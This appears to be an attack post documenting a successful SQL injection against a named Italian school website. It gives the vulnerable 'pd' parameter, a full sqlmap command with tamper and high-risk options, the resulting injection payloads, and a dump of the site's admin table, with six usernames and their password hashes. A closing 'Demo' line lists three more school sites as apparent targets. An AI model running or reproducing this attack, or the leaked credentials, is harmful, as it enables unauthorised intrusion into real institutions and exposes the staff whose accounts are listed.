Vln "/saperi-minimi/?pd="
sqlmap.py -u https://www.21mamelizuppetta.edu.it/404/ -D mamelizugn2016an -T pl_admin -C account_name,account_password --dump --random-agent --tamper=space2comment --no-cast --level=5 --risk=3 --batch
sqlmap identified the following injection point(s) with a total of 375 HTTP(s) requests:
---
Parameter: pd (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: pd=-4532" OR 1090=1090 AND "cbQV"="cbQV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pd=" AND (SELECT 1741 FROM (SELECT(SLEEP(5)))HWsi) AND "EPZk"="EPZk
Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: pd=" UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6a4e70424271495a6a747466776951705661554f655552554e52736e774151434f78474d6d635873,0x717a767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: Apache, PHP 5.6, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] mamelizugn2016an
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pd (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: pd=-4532" OR 1090=1090 AND "cbQV"="cbQV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pd=" AND (SELECT 1741 FROM (SELECT(SLEEP(5)))HWsi) AND "EPZk"="EPZk
Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: pd=" UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6a4e70424271495a6a747466776951705661554f655552554e52736e774151434f78474d6d635873,0x717a767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: Apache, PHP 5.6, PHP
back-end DBMS: MySQL >= 5.0.12
Database: mamelizugn2016an
Table: pl_admin
[6 entries]
+--------------+------------------------------------------+
| account_name | account_password |
+--------------+------------------------------------------+
| superadmin | f5a132809641edfec98bec665a389aadc7fc9fee |
| assistenza | 819af63f36e0a8ab0f0e1e2f1d877716d9b5878c |
| Stefania | ee9029b78940b1c84adec97a0eee03502165677d |
| ANTONIA | 0e4b3ead31e776b016d025b6244b4dbff536ee79 |
| MARIAROSARIA | 0e4b3ead31e776b016d025b6244b4dbff536ee79 |
| MASSIMO | 0e4b3ead31e776b016d025b6244b4dbff536ee79 |
+--------------+------------------------------------------+
Demo : www.einaudi-giordano.edu.it www.icrussolillo.edu.it www.istitutocomprensivoleopoldopilla.edu.it
